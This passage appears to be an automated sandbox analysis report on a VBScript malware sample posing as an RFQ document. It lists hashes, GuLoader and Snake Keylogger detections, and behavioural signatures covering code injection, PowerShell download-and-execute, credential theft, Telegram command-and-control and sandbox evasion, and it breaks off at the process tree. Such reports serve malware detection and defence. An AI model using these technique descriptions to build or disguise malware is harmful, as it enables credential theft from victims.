Windows Analysis Report
#U8a62#U50f9 (RFQ) -RFQ20241010.vbs
Overview
General Information
Sample name: #U8a62#U50f9 (RFQ) -RFQ20241010.vbs (renamed because the original name is a hash value)
Original sample name: (RFQ) -RFQ20241010.vbs
Analysis ID: 1530594
MD5: 1720cb49814844901b663405cb868b7d
SHA1: fcc41b466e5f919f302ab92bf5305b7ee3cce8b6
SHA256: 45395d14e4f88f3cdda6fef5f6c62c885faa538cf6c057fd4ac5de8ba876b706
Tags: vbs, user-abuse_ch
Detection
GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Snake Keylogger
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7436 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U8a62#U50f9 (RFQ) -RFQ20241010.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- powershell.exe (PID: 7620 cmdline: